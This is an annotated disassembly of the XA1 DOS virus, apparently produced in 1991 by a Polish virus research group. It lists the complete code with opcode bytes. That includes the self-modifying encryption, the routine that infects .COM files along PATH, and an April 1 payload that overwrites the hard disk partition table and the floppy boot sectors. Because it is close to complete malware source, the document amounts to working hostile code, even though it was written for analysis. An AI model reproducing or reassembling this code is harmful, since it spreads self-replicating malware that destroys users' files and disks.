;============================================== ; Virus XA1 isolated in Poland in June 1991 ; ; disassembled by Andrzej Kadlof July 1991 ; ; (C) Polish Section of Virus Information Bank ;============================================== ; virus entry point 0100 EB07 jmp 0109 0102 56 0A 03 59 00 ; first 7 bytes forms virus signature 0107 2A 00 ; generation counter, never used (?) ; prepare stack for tricks ; stack usage: ; [BP + 2] cleared but not used ; [BP + 0] offset in block ; [BP - 2] low byte of size of decrypted part and encryption key 0109 0E push cs ; make free space on stack 010A E80000 call 010D ; put current offset on the stack 010D FA cli ; disable interrupt to safe stack 010E 8BEC mov bp,sp 0110 58 pop ax 0111 32C0 xor al,al 0113 894602 mov [bp+02],ax ; corrupt debbuger return address ?? 0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt ; encrypt virus code, this routine is changed in different virus copies 011B B9CE05 mov cx,05CE ; length of decrypted block 011E B08C mov al,8C ; 8C is changed! 0120 8846FF mov [bp-01],al 0123 8B5E00 mov bx,[bp] ; current position in block ; ^^ changed, possible 3 wariants: ; ..5E.. mov bx,[bp] versions 0, 1, 2 ; ..76.. mov si,[bp] versions 3, 4, 5 ; ..7E.. mov di,[bp] versions 6, 7, 8 0126 884EFE mov [bp-02],cl ; low byte of counter 0129 8A4EFF mov cl,[bp-01] ; encrypt key 012C D207 rol byte ptr [bx],cl ; byte manipulation ; ^^^^ changed, possible 9 wariants: ; 000F add byte ptr [bx],cl version 0 ; 300F xor byte ptr [bx],cl version 1 ; D2O7 rol byte ptr [bx],cl version 2 ; 000C add byte ptr [si],cl version 3 ; 300C xor byte ptr [si],cl version 4 ; D204 rol byte ptr [si],cl version 5 ; 000D add byte ptr [di],cl version 6 ; 300D xor byte ptr [di],cl version 7 ; D205 rol byte ptr [di],cl version 8 012E EB00 jmp 0130 ; short pause 0130 43 inc bx ; position in block ; ^^ changed, possible 3 wariants: ; 43 inc bx version 0, 1, 2 ; 46 inc si version 3, 4, 5 ; 47 inc di version 6, 7, 8 0131 8A4EFE mov cl,[bp-02] ; restore block size 0134 E2F0 loop 0126 ; offset is decrypted! ; encrypted part 0136 FB sti ; get address of curent DTA and store it on the stack 0137 B42F mov ah,2F 0139 CD21 int 21 013B 06 push es 013C 53 push bx ; get keyboard status bits 013D 33C0 xor ax,ax 013F 8ED8 mov ds,ax 0141 A01704 mov al,[0417] 0144 2410 and al,10 ; extract scroll lock state 0146 50 push ax ; store 0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag ; restore DS 014C 8CC8 mov ax,cs 014E 8ED8 mov ds,ax ; intercepte INT 24h 0150 BAC606 mov dx,06C6 0153 B82425 mov ax,2524 ; set interrupt vector 0156 CD21 int 21 ; search for PATH= in environment block 0158 A12C00 mov ax,[002C] ; segment of environment block 015B 8EC0 mov es,ax 015D 33FF xor di,di ; begin of environment block 015F FC cld 0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker 0164 741D je 0183 ; end fo block 0166 BE1B05 mov si,051B ; offset of string 'PATH=' 0169 B90500 mov cx,0005 ; length of string 016C 8BC7 mov ax,di ; starting address 016E F3A6 rep cmpsb ; compare 0170 7411 je 0183 ; found 0172 8BF8 mov di,ax ; last starting point 0174 32C0 xor al,al 0176 B5FF mov ch,FF ; maximum block size 0178 F2AE repnz scasb 017A 74E4 je 0160 017C BF1A05 mov di,051A ; end of buffer for path 017F 8CC8 mov ax,cs ; restore ES 0181 8EC0 mov es,ax 0183 C706C1056205 mov word ptr [05C1],0562 ; set local DTA 0189 BA3605 mov dx,0536 018C B41A mov ah,1A ; set DTA 018E CD21 int 21 0190 A1F906 mov ax,[06F9] 0193 A3F706 mov [06F7],ax 0196 A1FD06 mov ax,[06FD] 0199 A3FB06 mov [06FB],ax 019C B90500 mov cx,0005 ; counter of potential victims 019F BA1505 mov dx,0515 ; '*.COM', 0 01A2 06 push es 01A3 57 push di 01A4 51 push cx 01A5 8CC8 mov ax,cs 01A7 8EC0 mov es,ax 01A9 B9FFFF mov cx,FFFF ; all possible attributes 01AC B44E mov ah,4E ; find first 01AE EB06 jmp 01B6 01B0 59 pop cx ; restore counter 01B1 E35B jcxz 020E ; limit reached, check show/destruction 01B3 B44F mov ah,4F ; find next 01B5 51 push cx ; store counter 01B6 CD21 int 21 01B8 7203 jb 01BD ; continue 01BA E9F100 jmp 02AE ; restore address of path in environment block 01BD 59 pop cx 01BE 5F pop di 01BF 07 pop es 01C0 26803D00 cmp es:byte ptr [di],00 ; end of block? 01C4 744A je 0210 ; yes ; copy path to buffer 01C6 BB6205 mov bx,0562 ; offset of buffer 01C9 268A05 mov al,es:[di] ; next character 01CC 0AC0 or al,al ; end of block? 01CE 740A je 01DA ; yes 01D0 47 inc di 01D1 3C3B cmp al,3B ; ';', end of path? 01D3 7405 je 01DA ; yes 01D5 8807 mov [bx],al ; copy character 01D7 43 inc bx ; increase pointer 01D8 EBEF jmp 01C9 ; get next character 01DA 81FB6205 cmp bx,0562 ; buffer not empty? 01DE 74E0 je 01C0 ; empty 01E0 8A47FF mov al,[bx-01] 01E3 3C3A cmp al,3A ; ':', root directory 01E5 7408 je 01EF ; yes 01E7 3C5C cmp al,5C ; check last character, '\' 01E9 7404 je 01EF ; there is 01EB C6075C mov byte ptr [bx],5C ; add '\' 01EE 43 inc bx ; pointer to last character 01EF 06 push es 01F0 57 push di 01F1 51 push cx 01F2 891EC105 mov [05C1],bx ; store it 01F6 8BF3 mov si,bx 01F8 81EB6205 sub bx,0562 ; find path length 01FC 8BCB mov cx,bx 01FE BF1405 mov di,0514 ; destination buffer 0201 8CC8 mov ax,cs ; restore ES 0203 8EC0 mov es,ax 0205 4E dec si 0206 FD std 0207 F3A4 rep movsb ; copy 0209 8BD7 mov dx,di 020B 42 inc dx 020C EB97 jmp 01A5 ; find first ; end of infection proces, check condition for destruction/show 020E 58 pop ax ; balance stack 020F 58 pop ax 0210 8CC8 mov ax,cs ; restore ES 0212 8EC0 mov es,ax ; get date 0214 B42A mov ah,2A ; get date 0216 CD21 int 21 0218 81FA0104 cmp dx,0401 ; April 1? 021C 7533 jne 0251 ; no ;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> ; ; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B: ; ;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> ; copy partition table to sector 11h of side 0, track 0 021E BA8000 mov dx,0080 ; first hard drive 0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table) 0224 BB0307 mov bx,0703 ; destroy victim code 0227 B80102 mov ax,0201 ; read 1 sector 022A 52 push dx 022B 51 push cx 022C 53 push bx 022D CD13 int 13 ; disk I/O 022F 5B pop bx 0230 59 pop cx 0231 5A pop dx 0232 B111 mov cl,11 ; new place for partition table 0234 B80103 mov ax,0301 ; write partition table 0237 CD13 int 13 ; set and of sector marker in the buffer 0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker ; overwrite partition table 023F B280 mov dl,80 0241 E87404 call 06B8 ; write one sector to disk ; overwrite boot sector of drive A: 0244 32D2 xor dl,dl 0246 E86F04 call 06B8 ; write one sector do disk ; overwrite boot sector of drive B: 0249 B201 mov dl,01 024B E86A04 call 06B8 ; write disk 024E EB0A jmp 025A 0250 90 nop ; compare date 0251 81FA180C cmp dx,0C18 ; december 24? 0255 7203 jb 025A ; date earlier ;<><><><<><><><><><><><><><><><><><><><> ; ; CHRISTMAS SHOW ; ; see the description of subroutine 05D7 ;<><><><><><><><><><><><><><><><><><><><><> 0257 E87D03 call 05D7 ; drow christmas tree ; make sound 025A E440 in al,40 025C 3CF8 cmp al,F8 025E 7206 jb 0266 0260 E461 in al,61 0262 0C03 or al,03 0264 E661 out 61,al ; restore the state of scroll lock flag 0266 33C0 xor ax,ax 0268 8ED8 mov ds,ax 026A 58 pop ax 026B 08061704 or [0417],al ; restore INT 24h 026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP 0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP 0279 B82425 mov ax,2524 ; set interrupt vector 027C CD21 int 21 ; restore DTA 027E 5A pop dx 027F 1F pop ds 0280 B41A mov ah,1A ; set DTA 0282 CD21 int 21 ; restore DS 0284 8CC8 mov ax,cs 0286 8ED8 mov ds,ax 0288 BEF006 mov si,06F0 028B 8B3EF706 mov di,[06F7] 028F 033EFB06 add di,[06FB] 0293 57 push di 0294 B90700 mov cx,0007 0297 FC cld 0298 F3A4 rep movsb 029A 33C0 xor ax,ax 029C 8BD8 mov bx,ax 029E 8BD0 mov dx,ax 02A0 8BE8 mov bp,ax 02A2 8B36F706 mov si,[06F7] 02A6 BF0001 mov di,0100 02A9 8B0EFB06 mov cx,[06FB] 02AD C3 ret 02AE BE5405 mov si,0554 ; file name in FCB 02B1 8B3EC105 mov di,[05C1] ; address of destination 02B5 B90D00 mov cx,000D ; length of asciiz string 02B8 FC cld 02B9 F3A4 rep movsb ; copy 02BB BF2005 mov di,0520 ; buffer for file name 02BE E8FA01 call 04BB ; copy 02C1 7503 jne 02C6 02C3 E9EAFE jmp 01B0 ; find next/destruct/show 02C6 BF2B05 mov di,052B 02C9 E8EF01 call 04BB ; copy file name 02CC 7503 jne 02D1 02CE E9DFFE jmp 01B0 ; find next/destruct/show 02D1 C606610500 mov byte ptr [0561],00 02D6 90 nop 02D7 F6064B0507 test byte ptr [054B],07 ; attribute byte in DTA 02DC 740F je 02ED ; hiden, system or read only, open file 02DE BA6205 mov dx,0562 ; file name 02E1 33C9 xor cx,cx ; clear all attributes 02E3 B80143 mov ax,4301 ; set file attributes 02E6 CD21 int 21 02E8 7303 jnb 02ED ; open file 02EA E9C3FE jmp 01B0 ; find next/destruct/show 02ED BA6205 mov dx,0562 02F0 B8023D mov ax,3D02 ; open file for read/write 02F3 CD21 int 21 02F5 8BD8 mov bx,ax ; handle 02F7 7303 jnb 02FC 02F9 E9B4FE jmp 01B0 ; find next ; check file size 02FC A15205 mov ax,[0552] ; high word of file size in DTA 02FF 0BC0 or ax,ax 0301 7403 je 0306 ; file below 64K 0303 E99001 jmp 0496 ; close file and find next 0306 A15005 mov ax,[0550] ; lower word of file size 0309 3D0700 cmp ax,0007 ; minimum file size 030C 72F5 jb 0303 ; close file and find next 030E 3D00F8 cmp ax,F800 ; maximum file size 0311 73F0 jnb 0303 ; close file and find next ; mayby already infected? 0313 8B16F706 mov dx,[06F7] ; form address of bufer 0317 0316FB06 add dx,[06FB] 031B B90700 mov cx,0007 ; number of bytes 031E 52 push dx 031F 51 push cx 0320 B43F mov ah,3F ; read file 0322 CD21 int 21 0324 59 pop cx 0325 5E pop si 0326 7208 jb 0330 ; read error, close and find next ; compare first 7 bytes with own code 0328 BF0001 mov di,0100 ; destination 032B FC cld 032C F3A6 rep cmpsb 032E 7503 jne 0333 0330 E96301 jmp 0496 ; close file and find next, (infected!) ; get and store file date and time 0333 B80057 mov ax,5700 ; get file time stamp 0336 CD21 int 21 0338 72F6 jb 0330 ; close file, find next 033A 89160107 mov [0701],dx ; store date 033E 890EFF06 mov [06FF],cx ; store time 0342 C606610501 mov byte ptr [0561],01 0347 90 nop ; check file size, if less than 603h bytes then append some garbage 0348 A15005 mov ax,[0550] ; file size 034B 3D0306 cmp ax,0603 034E 7321 jnb 0371 ; file length is less than 603h, add some garbage 0350 33D2 xor dx,dx 0352 33C9 xor cx,cx 0354 B80242 mov ax,4202 ; move file ptr to EOF 0357 CD21 int 21 0359 7303 jnb 035E ; no errors, continue 035B E93801 jmp 0496 ; close file and find next 035E B90306 mov cx,0603 ; number of bytes 0361 2B0E5005 sub cx,[0550] ; file size 0365 B440 mov ah,40 ; write file 0367 CD21 int 21 0369 B80306 mov ax,0603 ; new file size 036C 7303 jnb 0371 036E E92501 jmp 0496 ; close file and find next ; now file is at least 603h bytes long 0371 FEC4 inc ah 0373 A3F906 mov [06F9],ax ; oryginal file size + 256 0376 A15005 mov ax,[0550] ; file size 0379 BE0306 mov si,0603 ; virus length 037C 33FF xor di,di 037E 3BC6 cmp ax,si 0380 7302 jnb 0384 0382 8BF0 mov si,ax 0384 8936FD06 mov [06FD],si 0388 8BD7 mov dx,di 038A 33C9 xor cx,cx 038C B80042 mov ax,4200 ; move file ptr to BOF 038F CD21 int 21 0391 7303 jnb 0396 0393 E90001 jmp 0496 ; close file and find next 0396 8B16F706 mov dx,[06F7] 039A 0316FB06 add dx,[06FB] 039E B90002 mov cx,0200 03A1 3BF1 cmp si,cx 03A3 7302 jnb 03A7 03A5 8BCE mov cx,si ; number of bytes 03A7 52 push dx 03A8 51 push cx 03A9 B43F mov ah,3F ; read file 03AB CD21 int 21 03AD 59 pop cx 03AE 5A pop dx 03AF 7303 jnb 03B4 ; continue 03B1 E9E200 jmp 0496 ; close file and find next 03B4 52 push dx 03B5 51 push cx 03B6 33D2 xor dx,dx 03B8 33C9 xor cx,cx 03BA B80242 mov ax,4202 ; move file ptr to EOF 03BD CD21 int 21 03BF 59 pop cx 03C0 5A pop dx 03C1 7303 jnb 03C6 ; continue 03C3 E9D000 jmp 0496 ; close file and find next 03C6 B440 mov ah,40 ; write file 03C8 CD21 int 21 03CA 7303 jnb 03CF 03CC E9C700 jmp 0496 ; close file and find next 03CF 81C70002 add di,0200 03D3 81EE0002 sub si,0200 03D7 7602 jbe 03DB 03D9 EBAD jmp 0388 03DB FF060701 inc word ptr [0107] ; infection counter 03DF 33D2 xor dx,dx 03E1 33C9 xor cx,cx 03E3 B80042 mov ax,4200 ; move file ptr to BOF 03E6 CD21 int 21 03E8 7303 jnb 03ED 03EA E9A900 jmp 0496 ; close file and find next 03ED 53 push bx ; store handle 03EE E440 in al,40 03F0 A807 test al,07 03F2 74FA je 03EE 03F4 A21F01 mov [011F],al ; change decryption key ; get random number from system timer count 03F7 33C0 xor ax,ax 03F9 8AF8 mov bh,al 03FB 8ED8 mov ds,ax 03FD A06C04 mov al,[046C] ; timer, low byte 0400 8CCA mov dx,cs ; restore DS 0402 8EDA mov ds,dx ; generate rundom number in BX in the range 0..8 0404 B103 mov cl,03 0406 F6F1 div cl ; AL <- AL/3, AH <- remainder 0408 8AEC mov ch,ah ; store remainder (0, 1 or 2) 040A 32E4 xor ah,ah ; prepare division 040C F6F1 div cl ; AL <- AL / 9, AH <- remainder 040E 8AC4 mov al,ah ; AL <- second remainder 0410 02C0 add al,al ; *2, AL in [0..4] 0412 02C4 add al,ah ; *3, AL in [0..6] 0414 02C5 add al,ch ; first remainder 0416 8AD8 mov bl,al ; BL in [0..8] ; multiply BX by 4 (table entry size) 0418 03DB add bx,bx 041A 03DB add bx,bx 041C 81C3C906 add bx,06C9 ; offset of table ; modify encryption routine (automodyfication) 0420 8A07 mov al,[bx] 0422 A22401 mov [0124],al ; 3 versions 5E/76/7E 0425 8B4701 mov ax,[bx+01] 0428 A32C01 mov [012C],ax ; 9 wersions 042B 8A4703 mov al,[bx+03] ; 3 versions 042E A23001 mov [0130],al 0431 8AC5 mov al,ch ; prepare decrypt routine 0433 BBED06 mov bx,06ED 0436 D7 xlat 0437 A26104 mov [0461],al ; modify decryption routine ; write new encryption routine to file 043A 5B pop bx ; restore handle 043B BA0001 mov dx,0100 ; begin of file 043E B93500 mov cx,0035 ; block size 0441 B440 mov ah,40 ; write file 0443 CD21 int 21 0445 724F jb 0496 ; close file and find next ; decryption routine 0447 BE3501 mov si,0135 ; start of decrypted block 044A B9CE05 mov cx,05CE ; size of decrypted block 044D 53 push bx ; store handle 044E 51 push cx 044F B80002 mov ax,0200 0452 8B1EF706 mov bx,[06F7] 0456 031EFB06 add bx,[06FB] 045A 53 push bx 045B 8A0E1F01 mov cl,[011F] ; decription key 045F 8A2C mov ch,[si] 0461 D2CD ror ch,cl ; <-- changed (3 variants) ; ^^ changed byte, possible wariants: ; 28CD sub ch,cl versions: 0, 3, 6 ; 30CD xor ch,cl versions: 1, 4, 7 ; D2CD ror ch,cl versions: 2, 5, 8 0463 882F mov [bx],ch 0465 43 inc bx 0466 46 inc si 0467 48 dec ax 0468 75F5 jne 045F 046A 5A pop dx 046B 59 pop cx 046C 5B pop bx 046D 51 push cx 046E 81F90102 cmp cx,0201 0472 7203 jb 0477 0474 B90002 mov cx,0200 0477 B440 mov ah,40 ; write file 0479 CD21 int 21 047B 59 pop cx 047C 7218 jb 0496 ; close file and find next 047E 81E90002 sub cx,0200 0482 77C9 ja 044D ; restore file time stamp 0484 8B160107 mov dx,[0701] ; file date 0488 8B0EFF06 mov cx,[06FF] ; file time 048C B80157 mov ax,5701 ; set file time stamp 048F CD21 int 21 0491 7203 jb 0496 ; close file and find next ; decrease counter on the stack 0493 59 pop cx 0494 49 dec cx 0495 51 push cx 0496 B43E mov ah,3E ; close file 0498 CD21 int 21 049A 8A0E4B05 mov cl,[054B] ; attributes 049E FE0E6105 dec byte ptr [0561] 04A2 7405 je 04A9 04A4 F6C107 test cl,07 ; hidden, system, read only 04A7 740F je 04B8 04A9 80F920 cmp cl,20 ; archive 04AC 740A je 04B8 04AE BA6205 mov dx,0562 ; file name 04B1 32ED xor ch,ch 04B3 B80143 mov ax,4301 ; set file attributes 04B6 CD21 int 21 04B8 E9F5FC jmp 01B0 ; find next ;---------------------------------------- ; move 11 bytes do DS:DI ('C:\COMMAND.') 04BB BE6205 mov si,0562 04BE B90B00 mov cx,000B 04C1 FC cld 04C2 F3A6 rep cmpsb 04C4 C3 ret ; buffer for path 04C5 30 31 32 33 34 35 36 37 01234567 04CD 38 39 30 31 32 33 34 35 89012345 04D5 36 37 38 39 30 31 32 33 67890123 04DD 34 35 36 37 38 39 30 31 45678901 04E5 32 33 34 35 36 37 38 39 23456789 04ED 30 31 32 33 34 35 36 37 01234567 04F5 38 39 30 31 32 33 34 35 89012345 04FD 36 37 38 43 3A 5C 4A 45 678C:\JE 0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P 050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\ ; paterns for search 0515 2A 2E 43 4F 4D 00 50 41 *.COM PA 051D 54 48 3D TH= ; buffers for file names 0520 49 42 4D 42 49 IBMBI 0525 4F 2E 43 4F 4D 00 O.COM 052B 49 42 IB 052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM 0535 00 ; local DTA 0536 03 3F 3F 3F 3F 3F 3F ;\ 053D 3F 3F 43 4F 4D FF 02 00 ; | reserved 0545 00 00 00 00 00 00 ;/ 054B 20 ; file attribute 054C 00 60 71 0E ; file time stamp 0550 DB 62 00 00 ; file size 0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0) 0561 01 ; flag: attributes are changed 0562 43 3A 5C C:\ 0565 43 4F 4D 4D 41 4E 44 2E COMMAND. 056D 43 4F 4D 00 00 4D 00 00 COM M 0575 00 2E 43 4F 4D 00 4F 68 .COM Oh 057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo! 0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN 058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O 0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo 059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh 05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo! 05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN 05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O 05BD 68 4E 6F 21 hNo! 05C1 65 05 ; ;--------------------------------------- ; write character (or space) cx times 05C3 B020 mov al,20 05C5 50 push ax 05C6 E89E00 call 0667 ; write character 05C9 58 pop ax 05CA E2F9 loop 05C5 05CC C3 ret ;------------- ; next line 05CD B00D mov al,0D 05CF E89500 call 0667 ; write character 05D2 B00A mov al,0A 05D4 E99000 jmp 0667 ; write character ;------------------------------ ; drow christmast tree ; ; result will look like this: ; ; ; � ; *** ; ***** ; ******* ; ********* ; *********** ; ************* ; *************** ; ***************** ; ******************* ; ********************* ; *********************** ; ************************* ; *************************** ; ***************************** ; ��� ; ��� ; ��� ;������������������������������������������������������������������������������� ; Und er lebt doch noch : Der Tannenbaum ! ; Frohe Weihnachten ... ; 05D7 B92700 mov cx,0027 05DA E8E6FF call 05C3 ; clear 39 characters 05DD B0AD mov al,AD ; '�' 05DF E88500 call 0667 ; write character 05E2 E8E8FF call 05CD ; new line 05E5 BB0300 mov bx,0003 05E8 BA2600 mov dx,0026 05EB 8BCA mov cx,dx 05ED E8D3FF call 05C3 ; write CX spaces 05F0 8BCB mov cx,bx 05F2 B02A mov al,2A ; '*' 05F4 E8CEFF call 05C5 ; write CX characters 05F7 E8D3FF call 05CD ; new line 05FA 4A dec dx 05FB 83C302 add bx,0002 05FE 83FB1F cmp bx,001F 0601 75E8 jne 05EB 0603 BB0300 mov bx,0003 0606 B92600 mov cx,0026 0609 E8B7FF call 05C3 ; write CX spaces 060C B90300 mov cx,0003 060F B0DB mov al,DB ; '�' 0611 E8B1FF call 05C5 ; write CX characters 0614 E8B6FF call 05CD ; next line 0617 4B dec bx 0618 75EC jne 0606 061A B95000 mov cx,0050 ; full line 061D B0CD mov al,CD ; '�' 061F E8A3FF call 05C5 ; write character CX times 0622 B91300 mov cx,0013 0625 E89BFF call 05C3 ; write CX spaces 0628 BB7406 mov bx,0674 ; string: Und er lebt doch ... 062B E82C00 call 065A ; write string 062E B91D00 mov cx,001D 0631 E88FFF call 05C3 ; clear part of line 0634 EB24 jmp 065A ; write asciiz string pointed by BX 0636 90 nop 0637 E80000 call 063A 063A 5B pop bx 063B 83C30D add bx,000D 063E 8CC8 mov ax,cs 0640 8ED8 mov ds,ax 0642 E81500 call 065A ; write string 0645 EBFE jmp 0645 ; hang CPU 0647 41 70 72 69 6C 2C 20 41 April, A 064F 70 72 69 6C 20 2E 2E 2E pril ... 0657 20 07 00 ;----------------------------------- ; write asciiz string pointed by BX 065A 8A07 mov al,[bx] ; get character 065C 43 inc bx ; next character 065D 0AC0 or al,al ; and of string? 065F 7405 je 0666 ; yes, RET 0661 E80300 call 0667 ; write character 0664 EBF4 jmp 065A ; get next character 0666 C3 ret ;-------------------- ; write character TTL 0667 52 push dx 0668 51 push cx 0669 53 push bx 066A 32FF xor bh,bh 066C B40E mov ah,0E 066E CD10 int 10 0670 5B pop bx 0671 59 pop cx 0671 59 pop cx 0672 5A pop dx 0673 C3 ret 0674 55 6E 64 20 65 72 20 6C Und er l 067C 65 62 74 20 64 6F 63 68 ebt doch 0684 20 6E 6F 63 68 20 3A 20 noch : 068C 44 65 72 20 54 61 6E 6E Der Tann 0694 65 6E 62 61 75 6D 20 21 enbaum ! 069C 0D 0A 00 46 72 6F 68 65 Frohe 06A4 20 57 65 69 68 6E 61 63 Weihnac 06AC 68 74 65 6E 20 2E 2E 2E hten ... 06B4 0D 0A 07 00 ;------------------------------------------ ; write one sector to disk specified in DL ; track 9, side 0 sector 1 06B8 32F6 xor dh,dh 06BA B90100 mov cx,0001 06BD BB3706 mov bx,0637 06C0 B80103 mov ax,0301 06C3 CD13 int 13 06C5 C3 ret ;================== ; INT 24h handler 06C6 B000 mov al,00 06C8 CF iret ; table of bytes for changing encrypt routine 06C9 5E 00 0F 43 06CD 5E 30 0F 43 06D1 5E D2 07 43 06D5 76 00 0C 46 06D9 76 30 0C 46 06DD 76 D2 04 46 06E1 7E 00 0D 47 06E5 7E 30 0D 47 06E9 7E D2 05 47 ; table for variants of decrypt routine 06ED 28 30 D2 ; part of victime code 06F0 F3A4 rep movsb 06F2 8BF1 mov si,cx 06F4 8BF9 mov di,cx 06F6 C3 ret 06F7 0307 ; offset of buffer/modified code 06F9 DB63 ; file size + 256 06FB C603 ; 06FD 0306 ; 06FF 0060 ; file date 0701 710E ; file time